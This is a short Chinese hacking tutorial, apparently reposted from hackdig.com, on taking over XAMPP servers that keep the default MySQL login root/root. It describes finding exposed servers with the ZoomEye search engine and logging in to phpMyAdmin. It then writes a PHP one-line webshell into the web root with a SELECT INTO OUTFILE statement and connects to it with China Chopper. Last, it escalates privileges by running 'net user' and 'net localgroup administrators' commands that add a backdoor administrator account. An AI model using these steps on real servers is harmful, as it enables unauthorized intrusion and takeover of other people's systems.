xampp默认配置拿shell
首先我们先来科普一下xampp(Apache+MySQL+PHP+PERL)是一个功能强大的建 XAMPP 软件站集成软件包 是一个易于安装且包含 MySQL、PHP 和 Perl 的 Apache 发行版。XAMPP 的确非常容易安装和使用:只需下载,解压缩,启动即可。 然后在安装xampp的过程中 很多网站管理员对于mysql数据库密码 都会直接 默认 所以 就照成了这个漏洞的产生
好了 废话不多说 我们直接上神器钟馗之眼 server-status – server-info – phpmyadmin 账号密码: root/root port:80
如图找到一个网站 进去 初始的phpinfo 箭头指的是phpmyadmin的登陆地址
我们记下网站根目录C:/Program Files (x86)/xampp/xampps/htdocs
点进去之后我们输入 默认的用户名和密码 root root
进去之后我们呢输入sql语句 select ‘php一句话’ into outfile ‘C:/Program Files (x86)/xampp/xampps/htdocs/mgsrc.php’ 写入一句话
菜刀连之 然后我们在说一下提权
(1)首先输入命令添加用户:
net user test01 Mgs?1234567890 /add
(2)将普通用户加入到超级管理组administrators
然后输入net localgroup administrators mgsrc1 /add
(ps:在提权的时候 也走了很多弯路 这台服务器 的密码策略没关闭 所以 密码组合必须为一个大写字母 加一个符号然后加数字 而且 这台服务器 密码位数不能超过14位 不然就无响应)
文章转发地址:http://www.hackdig.com/04/hack-34524.htm